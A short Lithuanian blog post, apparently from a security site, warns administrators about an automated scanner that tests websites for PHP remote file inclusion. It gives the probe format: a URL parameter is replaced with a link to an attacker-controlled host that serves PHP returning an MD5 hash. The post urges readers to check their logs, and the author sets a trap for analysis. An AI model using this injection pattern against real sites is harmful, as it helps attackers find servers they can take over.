Per pasaulį keliauja automatizuota pažeidžiamumų paieška. Šiandien ji vėl užsuko į Lietuvą. Tikslas tokios paieškos paprastas - rasti tinklalapius, kuriuose galima vykdyti PHP programinį kodą iš nutolusių šaltinių. Pažeidžiamumų paieška vyksta per HTTP protokolo GET užklausų parametrus. T.y. per adreso eilutę. Pvz. Jei kažkokią informaciją iš puslapio galima pasiekti adresu www.isec.lt/page.php?id=1, tai pažeidžiamumas tikrinamas suformauojant tokį adresą: www.isec.lt/page.php?id=http://sahel55.com/articles/omaduro/kimumid/. Ir tas pats bandoma su visais adreso parametrais. Jei nueisit adresu http://sahel55.com/articles/omaduro/kimumid/, tai nerasit nieko daugiau, tik vieną PHP kodo eilutę:

Jei Jūsų serveris šios eilutės neapdoros, tai nieko ir neįvyks. Bet jei Jūsų serveris išskaičiuos MD5 ir pateiks kaip atsakymą į užklausą, tai automatinės pažeidžiamumo paieškos autoriams turėtų būti ženklas, kad galima perimti Jūsų serverio valdymą. Ir jie turbūt tai padarys. Neabejoju, kad su lietuviškais tinklalapiais jiems tikrai pasiseks. Po kelių dienų laukim pranešimo spaudoje su kokia nors tokia antrašte: “Arabų programišiai išdarkė daugiau nei pusę lietuviškų tinklalapių”. Dabar Jūs eikit žiūrėti savo tinklalapio log’ų ar pas jus šis testas dar nebuvo užsukęs ir ar jam nepasisekė, o aš einu paspęsiu spąstus tolimesnei analizei. Tikiuosi spąstai suveiks.